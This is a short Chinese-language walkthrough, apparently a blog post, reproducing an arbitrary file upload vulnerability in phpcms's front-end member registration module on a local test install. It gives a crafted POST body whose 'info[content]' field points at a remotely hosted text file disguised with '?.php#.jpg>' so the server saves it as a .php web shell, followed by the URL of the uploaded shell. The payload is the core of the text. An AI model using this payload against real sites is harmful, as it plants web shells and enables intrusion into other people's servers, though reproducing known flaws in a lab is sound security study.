phpcms前台注册模块，任意文件上传复现

参考：https://www.cnblogs.com/s1ye/p/8459316.html

           https://www.cnblogs.com/yuzly/p/11394620.html

环境准备：

需要先在服务器上（目标站点能够访问得到的ip，如目标站点是在公网上，则服务器的ip需为公网ip），上传一个shell.txt内容为：

此次试验是在本机进行：所以直接在本机写入一个index.txt即可,如下：

试验：

（1）访问：http://127.0.0.1/phpcms/install_package/index.php

（2）随便填写信息->抓包->改包

    ps: 修改数据包,添加POC,需要注意: 在repeater里测试go时每一次都要修改username，password和email字段值,保证不能重复。

将post包的数据内容改为：

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=http://127.0.0.1/index.txt?.php#.jpg>&dosubmit=1&protocol=

程序功能为：从http://127.0.0.1/index.txt中获取内容，存到.php文件中

（3）访问shell：http://127.0.0.1/phpcms/install_package/uploadfile/2021/0706/20210706115218919.php